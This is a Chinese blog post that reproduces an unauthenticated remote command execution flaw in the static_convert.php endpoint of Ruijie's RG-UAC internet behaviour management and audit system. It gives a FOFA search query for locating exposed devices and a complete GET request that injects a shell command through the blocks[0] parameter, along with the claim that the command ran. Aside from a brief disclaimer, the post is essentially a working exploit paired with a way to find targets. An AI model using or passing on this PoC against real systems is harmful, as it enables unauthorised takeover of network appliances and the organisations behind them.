锐捷统一上网行为管理与审计系统static_convert接口远程命令执行漏洞复现 [附POC]

已于 2024-07-09 14:01:02 修改
阅读量545 收藏 3
点赞数 12
分类专栏: Web 漏洞 文章标签: 安全 web安全 网络安全 系统安全
于 2024-07-09 10:41:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/140288963
版权

文章目录

锐捷统一上网行为管理与审计系统static_convert接口远程命令执行漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

锐捷统一上网行为管理与审计系统/static_convert.php接口存在远程命令执行漏洞,导致恶意攻击者可以执行命令获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。

0x03 影响版本

锐捷统一上网行为管理与审计系统

0x04 漏洞环境

FOFA语法:title=“RG-UAC登录页面”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%0aid%0a HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

3.复现

执行id命令
在这里插入图片描述

gaynell
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现】某厂商上网行为管理系统static_convert命令执行漏洞
晚风不及你
03-01 1130
天融信上网行为管理系统天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。
锐捷统一上网行为管理审计系统 static_convert.php 前台RCE漏洞复现
0xSec
06-21 1332
锐捷统一上网行为管理审计系统 static_convert.php 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
漏洞复现天融信上网行为管理系统 static_convert 任意命令执行
siu~
07-10 801
天融信上网行为管理系统 /view/IPV6/naborTable/static_convert.php接口blocks参数存在任意命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。
漏洞复现锐捷统一上网行为管理审计系统——naborTable/static_convert.php——命令执行
LongL_GuYu的博客
06-25 761
锐捷统一上网行为管理审计系统`naborTable/static_convert.php`接口存在远程命令执行漏洞,导致恶意攻击者可以执行命令获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
天融信下一代防火墙(NGFW)常用命令示例
weixin_42048685的博客
03-11 4702
define host add name oa服务器 ipaddr 192.168.1.1 #添加名称为“oa服务器”的主机对象,ip为192.168.1.1#define host add name oa服务器 ipaddr ‘192.168.1.1 192.168.1.2 192.168.1.3’ #添加名称为“oa服务器”的主机对象,ip为192.168.1.1、192.168.1.2以及192.168.1.3三个ip。
漏洞复现锐捷统一上网行为管理审计系统 static_convert.php 前台RCE漏洞
siu~
06-22 736
锐捷统一上网行为管理审计系统 static_convert.php 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
RG-UAC锐捷统一上网行为管理审计系统 远程代码执行漏洞复现
Keepb1ue的博客
03-05 600
锐捷统一上网行为管理审计RG-UAC系列产品线提供不同档次的多款型号,从低端、中端、高端适用于政府、教育、医疗、数据中心、大型网络边界、通用企业等全业务应用场景。访问写入文件路径:/view/vpn/autovpn/123.php。锐捷RG-UAC统一上网行为管理审计系统。title=“RG-UAC登录页面”1、联系软件厂商升级至最新安全版本。2、如非必要,禁止公网访问该系统
1day 锐捷统一上网行为管理审计系统naborTable命令执行漏洞
weixin_43167326的博客
06-18 899
锐捷统一上网行为管理审计系统是一种专业的网络管理解决方案,旨在帮助组织监控和管理网络使用。通过精确的流量控制和详尽的审计功能,系统能够实时分析和记录用户的上网行为,保障网络安全和资源合理利用。它支持多种认证方式和策略配置,提供强大的报表生成和统计分析功能,帮助管理员有效管理带宽、优化网络性能,确保网络环境的稳定与安全
RG-UAC6000系列统一上网行为管理审计产品白皮书.docx
11-30
锐捷RG-UAC6000系列统一上网行为管理审计产品是一款为企业网络提供精细化管理与安全审计的解决方案。该系列产品设计旨在提升网络性能,保障数据安全,优化带宽使用,并实现详尽的上网行为审计。 1. **产品特性** ...
RG-UAC6000系列统一上网行为管理审计产品白皮书.pdf
10-15
锐捷网络的RG-UAC6000系列统一上网行为管理审计产品是一款为企业和组织设计的高级网络管理解决方案。该产品旨在提供全面的网络流量监控、应用控制、带宽管理和日志审计功能,以确保网络的安全性、高效性和合规性。...
锐捷商通奶茶管理系统V11安装视频教程
08-21
鉴于很多新手朋友不会安装锐捷商通系列软件,故而出此视频教程!仅供参考!
锐捷无限地勘系统v1.2版本
04-10
锐捷无限地勘系统v1.2版本是一款专注于网络系统管理的专业软件,主要应用于地理信息系统(GIS)和无线网络规划与勘查。这个版本是开发者针对前期版本进行优化升级后的成果,旨在提供更高效、准确的无线网络解决方案...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 733
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 603
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 575
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 1555
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网安新声 | 微软蓝屏事件安全启示录
WAJXY2021的博客
08-05 168
微软蓝屏事件敲响警钟,给行业带来什么样的反思呢?
锐捷RGMP集群管理系统统一管理网络设备
系统配置包括了对集群管理系统本身的要求和服务器硬件的要求。在安装过程中,用户需要按照手册指导进行操作,同时了解如何卸载软件以进行版本更新或移除。 软件的操作界面简洁直观,提供了启动、退出、工具栏、状态...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值